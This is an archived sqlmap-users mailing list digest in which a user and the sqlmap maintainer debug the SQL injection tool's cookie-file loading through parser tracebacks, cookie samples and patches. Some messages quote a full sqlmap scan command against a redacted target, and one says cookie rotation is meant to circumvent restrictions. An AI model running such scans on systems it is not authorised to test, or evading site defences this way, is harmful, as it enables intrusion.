>>>> Traceback (most recent call last):
>>>> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>>> _really_load
>>>> assert domain_specified == initial_dot
>>>> AssertionError
>>>>
>>>> _warn_unhandled_exception()
>>>> [11:13:26] [CRITICAL] there was a problem loading cookies file
>>>> ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>>
>>>> the 999.. looks strange to me.
>>>>
>>>> >
>>>> >
>>>> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>>> mir...@gm... <mailto:mir...@gm...>> wrote:
>>>> >
>>>> > Hi Dirk.
>>>> >
>>>> > Well, I would say that you have an expired cookie. Do you see that
>>>> value 0? That value should be a valid UNIX time representing time of cookie
>>>> expiration. Also, I've just tested that cookie of yours and sqlmap says:
>>>> "[WARNING] cookie '....' has expired"
>>>> >
>>>>
>>>> that's true but IMO 0 represents just a session cookie. Example:
>>>>
>>>> prompt% wget -q -O /dev/null --keep-session-cookies
>>>> --save-cookies=/dev/stdout bing.com
>>>> # HTTP cookie file.
>>>> # Generated by Wget on 2013-04-15 11:23:13.
>>>> # Edit at your own risk.
>>>>
>>>> .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>>> AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>>> .bing.com TRUE / FALSE 1429089794 OrigMUID
>>>> 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>>> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> .bing.com TRUE / FALSE 0 _HOP
>>>> .bing.com TRUE / FALSE 0 _FS NU=1
>>>> .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>>> www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>>> V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> www.bing.com FALSE / FALSE 1429089794 MUIDB
>>>> 333995A69E06630B2EB491169F016314
>>>>
>>>> prompt%
>>>>
>>>> Same parser problem btw if I edit the cookie file and put 1429089794
>>>> unix time instead of 0 in there.
>>>>
>>>> Ok: With the prev rev ed5599f it reads this file ok (no session cookies
>>>> but cookies w/ expiration date) and uses the last
>>>> cookie only for the first 120 tries.
>>>>
>>>> Cheers, Dirk
>>>>
>>>>
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> >
>>>> >
>>>> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...>> wrote:
>>>> >
>>>> >
>>>> > Hi Miroslav,
>>>> >
>>>> > thx for your prompt answer.
>>>> >
>>>> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Could you please get the latest revision and retry it again?
>>>> > ed5599f: almost the same: with cookie in the header sqlmap takes only
>>>> this one.
>>>> > The slight difference seems to be that in the case where I didn't
>>>> supply a cookie
>>>> > sqlmap doesn't use any cookie at all, i.e. now not the one from the
>>>> server anymore.
>>>> > >
>>>> > > There was a situation where info messages have been wrongly written
>>>> that original response contained Set-Cookie in situations like yours.
>>>> >
>>>> > > In case that everything stays as it is, I'll need to ask you to
>>>> provide more details. For example, cookie file would be great.
>>>> >
>>>> > sure, here you go:
>>>> >
>>>> > --snip
>>>> > # Netscape HTTP Cookie File
>>>> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>>> > [..]
>>>> > --snap
>>>> >
>>>> > They are all session cookies. For easier reading here I put some
>>>> blanks in the line
>>>> > above, in "cookie-file" there aren't any though. Cookies were
>>>> generated with
>>>> > stompy and a shell script (looks the same as with
>>>> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file>
>>>> <URL>)
>>>> >
>>>> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>>> >
>>>> > >
>>>> > > Also, please make sure that the cookie file contains proper
>>>> cookie(s) - domain name should be the same as a domain of target, cookie
>>>> needs to have a proper valid time, etc.
>>>> >
>>>> > see above.
>>>> >
>>>> > Cheers,
>>>> >
>>>> > Dirk
>>>> >
>>>> > >
>>>> > >
>>>> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>
>>>> wrote:
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > yes unfortunately.
>>>> > >
>>>> > > If I omit the cookie line in the request header completely, sqlmap
>>>> > > seems to take the first cookie issued by the server with set-cookie
>>>> (and
>>>> > > puts it silently in).
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > >
>>>> > >
>>>> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > Hi.
>>>> > > >
>>>> > > > And this is also happening if you are skipping "Cookie:
>>>> JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>>> > > >
>>>> > > > Kind regards,
>>>> > > > Miroslav Stampar
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>
>>>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>>> > > >
>>>> > > >
>>>> > > > Hi folks,
>>>> > > >
>>>> > > > .... that doesn't work for me. It always uses the cookie supplied
>>>> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>>> > > > from the 1st server reply is being used)
>>>> > > >
>>>> > > > So what is wrong in here:
>>>> > > >
>>>> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > --level=2 --risk=2 -r $REQUEST
>>>> > > >
>>>> > > > The content of the file $REQUEST is:
>>>> > > >
>>>> > > > POST <URL> HTTP/1.1
>>>> > > > Host: <HOST>
>>>> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US)
>>>> AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > Chrome/0.2.149.6 <http://0.2.149.6> <http://0.2.149.6> <
>>>> http://0.2.149.6> Safari/525.13
>>>> > > > Accept:
>>>> text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > Accept-Language: en-US,en;q=0.5
>>>> > > > Accept-Encoding: gzip, deflate
>>>> > > > Referer: <Referer>
>>>> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > Connection: keep-alive
>>>> > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > Content-Length: 67
>>>> > > >
>>>> > > > <abunchofpostparams>
>>>> > > >
>>>> > > >
>>>> > > > No hints that cookie-file is not in correct format (I've been
>>>> through this,
>>>> > > > at least I think so ;) ).
>>>> > > >
>>>> > > > Any insight would be much appreciated.
>>>> > > >
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > >
>>>> > > >
>>>> ------------------------------------------------------------------------------
>>>> > > > Precog is a next-generation analytics platform capable of advanced
>>>> > > > analytics on semi-structured data. The platform includes APIs for
>>>> building
>>>> > > > apps and a phenomenal toolset for data science. Developers can use
>>>> > > > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > > > _______________________________________________
>>>> > > > sqlmap-users mailing list
>>>> > > > sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...> <mailto:
>>>> sql...@li... <mailto:
>>>> sql...@li...>>>
>>>> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>> >
>>>> >
>>>> >
>>>> >
>>>> > --
>>>> > Miroslav Stampar
>>>> > http://about.me/stamparm
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 3
>>>> Date: Mon, 15 Apr 2013 11:45:19 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Dirk Wetter <sp...@dr...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi Dirk.
>>>>
>>>> Now that crash should be "patched".
>>>>
>>>> Could you please retry it now and say if the latest revision suits your
>>>> needs?
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>>
>>>> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...>
>>>> wrote:
>>>>
>>>> >
>>>> >
>>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > > Nevertheless, with the latest commit that check should be
>>>> "neutralized"
>>>> > now. Could you please retry it now?
>>>> >
>>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> > hiccups, using the same file:
>>>> >
>>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
>>>> > Traceback (most recent call last):
>>>> > File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in
>>>> > _really_load
>>>> > assert domain_specified == initial_dot
>>>> > AssertionError
>>>> >
>>>> > _warn_unhandled_exception()
>>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file
>>>> ('invalid
>>>> > Netscape format cookies file '/tmp/sqlmapcj-pbP7P1':
>>>> >
>>>> '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>> >
>>>> > the 999.. looks strange to me.
>>>> >
>>>> > >
>>>> > >
>>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <
>>>> > mir...@gm... <mailto:mir...@gm...>>
>>>> wrote:
>>>> > >
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Well, I would say that you have an expired cookie. Do you see that
>>>> > value 0? That value should be a valid UNIX time representing time of
>>>> cookie
>>>> > expiration. Also, I've just tested that cookie of yours and sqlmap
>>>> says:
>>>> > "[WARNING] cookie '....' has expired"
>>>> > >
>>>> >
>>>> > that's true but IMO 0 represents just a session cookie. Example:
>>>> >
>>>> > prompt% wget -q -O /dev/null --keep-session-cookies
>>>> > --save-cookies=/dev/stdout bing.com
>>>> > # HTTP cookie file.
>>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>>> > # Edit at your own risk.
>>>> >
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR
>>>> > AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHD
>>>> > D=2781203&MS=2781203&AF=NOFORM
>>>> > .bing.com TRUE / FALSE 1429089794 OrigMUID
>>>> > 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> > .bing.com TRUE / FALSE 1429089794 MUID
>>>> > 333995A69E06630B2EB491169F016314
>>>> > .bing.com TRUE / FALSE 0 _SS
>>>> > SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> > .bing.com TRUE / FALSE 0 _HOP
>>>> > .bing.com TRUE / FALSE 0 _FS NU=1
>>>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID
>>>> > V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> > www.bing.com FALSE / FALSE 1429089794 MUIDB
>>>> > 333995A69E06630B2EB491169F016314
>>>> >
>>>> > prompt%
>>>> >
>>>> > Same parser problem btw if I edit the cookie file and put 1429089794
>>>> unix
>>>> > time instead of 0 in there.
>>>> >
>>>> > Ok: With the prev rev ed5599f it reads this file ok (no session
>>>> cookies
>>>> > but cookies w/ expiration date) and uses the last
>>>> > cookie only for the first 120 tries.
>>>> >
>>>> > Cheers, Dirk
>>>> >
>>>> >
>>>> > >
>>>> > > Kind regards,
>>>> > > Miroslav Stampar
>>>> > >
>>>> > >
>>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...
>>>> <mailto:
>>>> > sp...@dr...>> wrote:
>>>> > >
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > thx for your prompt answer.
>>>> > >
>>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > > Hi Dirk.
>>>> > > >
>>>> > > > Could you please get the latest revision and retry it again?
>>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes
>>>> > only this one.
>>>> > > The slight difference seems to be that in the case where I
>>>> > didn't supply a cookie
>>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from
>>>> > the server anymore.
>>>> > > >
>>>> > > > There was a situation where info messages have been wrongly
>>>> > written that original response contained Set-Cookie in situations like
>>>> > yours.
>>>> > > >
>>>> > > > In case that everything stays as it is, I'll need to ask you
>>>> > to provide more details. For example, cookie file would be great.
>>>> > >
>>>> > > sure, here you go:
>>>> > >
>>>> > > --snip
>>>> > > # Netscape HTTP Cookie File
>>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID
>>>> > \t <Cookie>
>>>> > > [..]
>>>> > > --snap
>>>> > >
>>>> > > They are all session cookies. For easier reading here I put some
>>>> > blanks in the line
>>>> > > above, in "cookie-file" there aren't any though. Cookies were
>>>> > generated with
>>>> > > stompy and a shell script (looks the same as with
>>>> > > wget -S -O /dev/null --keep-session-cookies
>>>> > --save-cookies=<file> <URL>)
>>>> > >
>>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies
>>>> > file ;-)
>>>> > >
>>>> > > >
>>>> > > > Also, please make sure that the cookie file contains proper
>>>> > cookie(s) - domain name should be the same as a domain of target,
>>>> cookie
>>>> > needs to have a proper valid time, etc.
>>>> > >
>>>> > > see above.
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <
>>>> > sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr...<mailto:
>>>> > sp...@dr...>>> wrote:
>>>> > > >
>>>> > > > Hi Miroslav,
>>>> > > >
>>>> > > > yes unfortunately.
>>>> > > >
>>>> > > > If I omit the cookie line in the request header
>>>> > completely, sqlmap
>>>> > > > seems to take the first cookie issued by the server with
>>>> > set-cookie (and
>>>> > > > puts it silently in).
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > > Hi.
>>>> > > > >
>>>> > > > > And this is also happening if you are skipping "Cookie:
>>>> > JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original
>>>> request?
>>>> > > > >
>>>> > > > > Kind regards,
>>>> > > > > Miroslav Stampar
>>>> > > > >
>>>> > > > >
>>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <
>>>> > sp...@dr... <mailto:sp...@dr...> <mailto:
>>>> sp...@dr...<mailto:
>>>> > sp...@dr...>> <mailto:sp...@dr... <mailto:
>>>> sp...@dr...>
>>>> > <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote:
>>>> > > > >
>>>> > > > >
>>>> > > > > Hi folks,
>>>> > > > >
>>>> > > > > .... that doesn't work for me. It always uses the
>>>> > cookie supplied
>>>> > > > > (below in $REQUEST, or if I omit the line in
>>>> > $REQUEST the one
>>>> > > > > from the 1st server reply is being used)
>>>> > > > >
>>>> > > > > So what is wrong in here:
>>>> > > > >
>>>> > > > > cd
>>>> > ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > > --level=2 --risk=2 -r $REQUEST
>>>> > > > >
>>>> > > > > The content of the file $REQUEST is:
>>>> > > > >
>>>> > > > > POST <URL> HTTP/1.1
>>>> > > > > Host: <HOST>
>>>> > > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2;
>>>> > en-US) AppleWebKit/525.13 (KHTML, like Gecko)
>>>> > > > > Chrome/0.2.149.6 <http://0.2.149.6> <
>>>> > http://0.2.149.6> <http://0.2.149.6> Safari/525.13
>>>> > > > > Accept:
>>>> > text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>>>> > > > > Accept-Language: en-US,en;q=0.5
>>>> > > > > Accept-Encoding: gzip, deflate
>>>> > > > > Referer: <Referer>
>>>> > > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
>>>> > > > > Connection: keep-alive
>>>> > > > > Content-Type: application/x-www-form-urlencoded
>>>> > > > > Content-Length: 67
>>>> > > > >
>>>> > > > > <abunchofpostparams>
>>>> > > > >
>>>> > > > >
>>>> > > > > No hints that cookie-file is not in correct format
>>>> > (I've been through this,
>>>> > > > > at least I think so ;) ).
>>>> > > > >
>>>> > > > > Any insight would be much appreciated.
>>>> > > > >
>>>> > > > >
>>>> > > > > Cheers,
>>>> > > > >
>>>> > > > > Dirk
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> >
>>>> ------------------------------------------------------------------------------
>>>> > > > > Precog is a next-generation analytics platform
>>>> > capable of advanced
>>>> > > > > analytics on semi-structured data. The platform
>>>> > includes APIs for building
>>>> > > > > apps and a phenomenal toolset for data science.
>>>> > Developers can use
>>>> > > > > our toolset for easy data analysis & visualization.
>>>> > Get a free account!
>>>> > > > >
>>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > > > > _______________________________________________
>>>> > > > > sqlmap-users mailing list
>>>> > > > > sql...@li... <mailto:
>>>> > sql...@li...> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...>> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...> <mailto:
>>>> > sql...@li... <mailto:
>>>> > sql...@li...>>>
>>>> > > > >
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > >
>>>> > > > > --
>>>> > > > > Miroslav Stampar
>>>> > > > > http://about.me/stamparm
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > >
>>>> > > > --
>>>> > > > Miroslav Stampar
>>>> > > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> > >
>>>> > >
>>>> > >
>>>> > >
>>>> > > --
>>>> > > Miroslav Stampar
>>>> > > http://about.me/stamparm
>>>> >
>>>> >
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 4
>>>> Date: Mon, 15 Apr 2013 11:46:21 +0200
>>>> From: Miroslav Stampar <mir...@gm...>
>>>> Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in
>>>> clean_filesystem
>>>> To: Brandon Perry <bpe...@gm...>
>>>> Cc: sqlmap users <sql...@li...>
>>>> Message-ID:
>>>> <CA+9yoX3RNQDm=PqT...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Hi Brandon.
>>>>
>>>> Thank you for your patch and find it now included [1].
>>>>
>>>> Kind regards,
>>>> Miroslav Stampar
>>>>
>>>> [1]
>>>>
>>>> https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224
>>>>
>>>>
>>>> On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <
>>>> bpe...@gm...>wrote:
>>>>
>>>> > Hi, the attached patch fixes an issue with the /task/<task_id>/delete
>>>> api
>>>> > call when self.output_directory is NoneType and clean_system() is
>>>> called.
>>>> >
>>>> > --
>>>> > http://volatile-minds.blogspot.com -- blog
>>>> > http://www.volatileminds.net -- website
>>>> >
>>>> >
>>>> >
>>>> ------------------------------------------------------------------------------
>>>> > Precog is a next-generation analytics platform capable of advanced
>>>> > analytics on semi-structured data. The platform includes APIs for
>>>> building
>>>> > apps and a phenomenal toolset for data science. Developers can use
>>>> > our toolset for easy data analysis & visualization. Get a free
>>>> account!
>>>> > http://www2.precog.com/precogplatform/slashdotnewsletter
>>>> > _______________________________________________
>>>> > sqlmap-users mailing list
>>>> > sql...@li...
>>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> >
>>>> >
>>>>
>>>>
>>>> --
>>>> Miroslav Stampar
>>>> http://about.me/stamparm
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 5
>>>> Date: Mon, 15 Apr 2013 12:19:13 +0200
>>>> From: Dirk Wetter <sp...@dr...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <516...@dr...>
>>>> Content-Type: text/plain; charset=ISO-8859-1
>>>>
>>>> Hi Miroslav,
>>>>
>>>> On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
>>>> > Hi Dirk.
>>>> >
>>>> > Now that crash should be "patched".
>>>> >
>>>> > Could you please retry it now and say if the latest revision suits
>>>> your needs?
>>>>
>>>> cool, thx. Works!
>>>>
>>>> However (sorry):
>>>>
>>>> One needs to omit the cookie in the request header, otherwise it just
>>>> uses the one
>>>> supplied by the request.
>>>>
>>>> Then: It doesn't change the cookie. Maybe I was interpreting that not
>>>> correctly
>>>> but my point was using the load-cookies option to direct sqlmap to
>>>> change
>>>> cookies once in a while (whenever that's gonna be). This is to
>>>> circumvent
>>>> restrictions one can encounter otherwise....
>>>>
>>>> Cheers,
>>>>
>>>> Dirk
>>>>
>>>>
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> >
>>>> >
>>>> > On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...<mailto:
>>>> sp...@dr...>> wrote:
>>>> >
>>>> >
>>>> >
>>>> > On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > > Nevertheless, with the latest commit that check should be
>>>> "neutralized" now. Could you please retry it now?
>>>> >
>>>> > thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> hiccups, using the same file:
>>>> >
>>>> > /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
>>>> > Traceback (most recent call last):
>>>> >   File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
>>>> >     assert domain_specified == initial_dot
>>>> > AssertionError
>>>> >
>>>> > _warn_unhandled_exception()
>>>> > [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>>>> >
>>>> > the 999.. looks strange to me.
>>>> >
>>>> > >
>>>> > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
>>>> > >
>>>> > > Hi Dirk.
>>>> > >
>>>> > > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
>>>> > >
>>>> >
>>>> > that's true but IMO 0 represents just a session cookie. Example:
>>>> >
>>>> > prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
>>>> > # HTTP cookie file.
>>>> > # Generated by Wget on 2013-04-15 11:23:13.
>>>> > # Edit at your own risk.
>>>> >
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
>>>> > .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
>>>> > .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
>>>> > .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
>>>> > .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
>>>> > .bing.com TRUE / FALSE 0 _HOP
>>>> > .bing.com TRUE / FALSE 0 _FS NU=1
>>>> > .bing.com TRUE / FALSE 1429089794 _FP EM=1
>>>> > www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
>>>> > www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>>>> >
>>>> > prompt%
>>>> >
>>>> > Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>>>> >
>>>> > Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
>>>> > cookie only for the first 120 tries.
>>>> >
>>>> > Cheers, Dirk
>>>> >
>>>> > >
>>>> > > Kind regards,
>>>> > > Miroslav Stampar
>>>> > >
>>>> > >
>>>> > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
>>>> > >
>>>> > > Hi Miroslav,
>>>> > >
>>>> > > thx for your prompt answer.
>>>> > >
>>>> > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
>>>> > > > Hi Dirk.
>>>> > > >
>>>> > > > Could you please get the latest revision and retry it again?
>>>> > > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
>>>> > > The slight difference seems to be that in the case where I didn't supply a cookie
>>>> > > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
>>>> > > >
>>>> > > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
>>>> > > >
>>>> > > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
>>>> > >
>>>> > > sure, here you go:
>>>> > >
>>>> > > --snip
>>>> > > # Netscape HTTP Cookie File
>>>> > > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
>>>> > > [..]
>>>> > > --snap
>>>> > >
>>>> > > They are all session cookies. For easier reading here I put some blanks in the line
>>>> > > above, in "cookie-file" there aren't any though. Cookies were generated with
>>>> > > stompy and a shell script (looks the same as with
>>>> > > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
>>>> > >
>>>> > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
>>>> > >
>>>> > > >
>>>> > > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
>>>> > >
>>>> > > see above.
>>>> > >
>>>> > > Cheers,
>>>> > >
>>>> > > Dirk
>>>> > >
>>>> > > >
>>>> > > >
>>>> > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
>>>> > > >
>>>> > > > Hi Miroslav,
>>>> > > >
>>>> > > > yes unfortunately.
>>>> > > >
>>>> > > > If I omit the cookie line in the request header completely, sqlmap
>>>> > > > seems to take the first cookie issued by the server with set-cookie (and
>>>> > > > puts it silently in).
>>>> > > >
>>>> > > > Cheers,
>>>> > > >
>>>> > > > Dirk
>>>> > > >
>>>> > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
>>>> > > > > Hi.
>>>> > > > >
>>>> > > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
>>>> > > > >
>>>> > > > > Kind regards,
>>>> > > > > Miroslav Stampar
>>>> > > > >
>>>> > > > >
>>>> > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
>>>> > > > >
>>>> > > > > Hi folks,
>>>> > > > >
>>>> > > > > .... that doesn't work for me. It always uses the cookie supplied
>>>> > > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
>>>> > > > > from the 1st server reply is being used)
>>>> > > > >
>>>> > > > > So what is wrong in here:
>>>> > > > >
>>>> > > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
>>>> > > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
>>>> > > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
>>>> > > > > --level=2 --risk=2 -r $REQUEST
>>>> > > > >
>>>> > > > > The content of the file $REQUEST is:
>>>> > > > >
>>>> > > > > POST <URL> HTTP/1.1
